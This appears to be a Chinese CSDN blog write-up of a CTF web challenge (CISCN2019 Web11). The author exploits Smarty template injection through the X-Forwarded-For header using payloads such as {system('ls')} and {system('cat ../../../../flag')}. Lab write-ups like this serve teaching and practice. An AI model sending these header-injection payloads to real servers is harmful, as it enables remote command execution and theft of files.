NO.2-29 [CISCN2019 华东南赛区]Web11

最新推荐文章于 2024-04-07 22:19:05 发布
最新推荐文章于 2024-04-07 22:19:05 发布
阅读量303 收藏
点赞数
分类专栏: BUUCTF 模板注入 文章标签: php smarty
原文链接:https://blog.csdn.net/weixin_44632787/article/details/118162260
版权

BUUCTF之[CISCN2019 华东南赛区]Web11

知识点

  • SSTI
  • smarty
  • X-Forwarded-For

题目

于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1

emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到!
所以开始尝试一下:X-Forwarded-For:{7*8}
 
在这里插入图片描述
获取当前目录有那些文件:X-Forwarded-For:{system('ls')}

 
在这里插入图片描述
读取某个文件比如:X-Forwarded-For:{system('cat /api')}。但是我试了以下的所有文件都没找到flag

  • X-Forwarded-For:{system(‘cat /api’)}
  • X-Forwarded-For:{system(‘cat /css’)}
  • X-Forwarded-For:{system(‘cat /index.php’)}
  • X-Forwarded-For:{system(‘cat /smarty’)}
  • X-Forwarded-For:{system(‘cat /templates_c’)}
  • X-Forwarded-For:{system(‘cat /xff’)}
  • X-Forwarded-For:{system(‘cat /flag’)}
  • X-Forwarded-For:{system(‘cat /flag.php’)}

所以猜测flag可能是在根目录下,所以X-Forwarded-For:{system('cat ../../../../../../../../flag')}
在这里插入图片描述
这样就可以获取到flag啦!!!

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2629
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
[CISCN2019 华东赛区]Web11
pakho_C的博客
08-02 577
smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造sstipayload。Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错。每个{if}必须有一个配对的{/if}.也可以使用{else}和{elseif}....
CISCN2019web刷题记录
最新发布
m0_73239569的博客
04-07 998
考虑能将某种进制的数字字符串转换成特定字符串的函数,类似hex2bin(),因为 hex2bin() 接收的十六进制数字字符串("5f474554")可以由整型数字(1598506324)通过 dechex() 函数转换得到,而 hex2bin() 返回一个特定的字符串。,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。
高力国际-华东2018H2写字楼市场概览-2019.3-7页.pdf
09-01
高力国际-华东2018H2写字楼市场概览-2019.3-7页.pdf
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
华东理工大学网教电子商务2-期末复习题及参考答案.docx
12-17
华东理工大学网教电子商务2-期末复习题及参考答案.docx
华东政法大学 2023.2.25 - 人工智能通用大模型(ChatGPT)的进展-风险与应对
04-19
华东政法大学 2023.2.25 - 人工智能通用大模型(ChatGPT)的进展__风险与应对
华东师范大学-计算机应用基础.docx
06-21
华东师范大学-计算机应用基础.docx
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 616
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 412
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
@Service public class UploadPicturesServiceImpl implements UploadPicturesService { @Override public String uploadPicture(MultipartFile file) throws IOException { String qiniuUrl = "http://rv60qz4zc.hn-bkt.clouddn.com/"; Configura
05-25
//指定空间所在的区域,华东为zone0 UploadManager uploadManager = new UploadManager(cfg); String accessKey = "your access key"; String secretKey = "your secret key"; String bucket = "your bucket name";...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值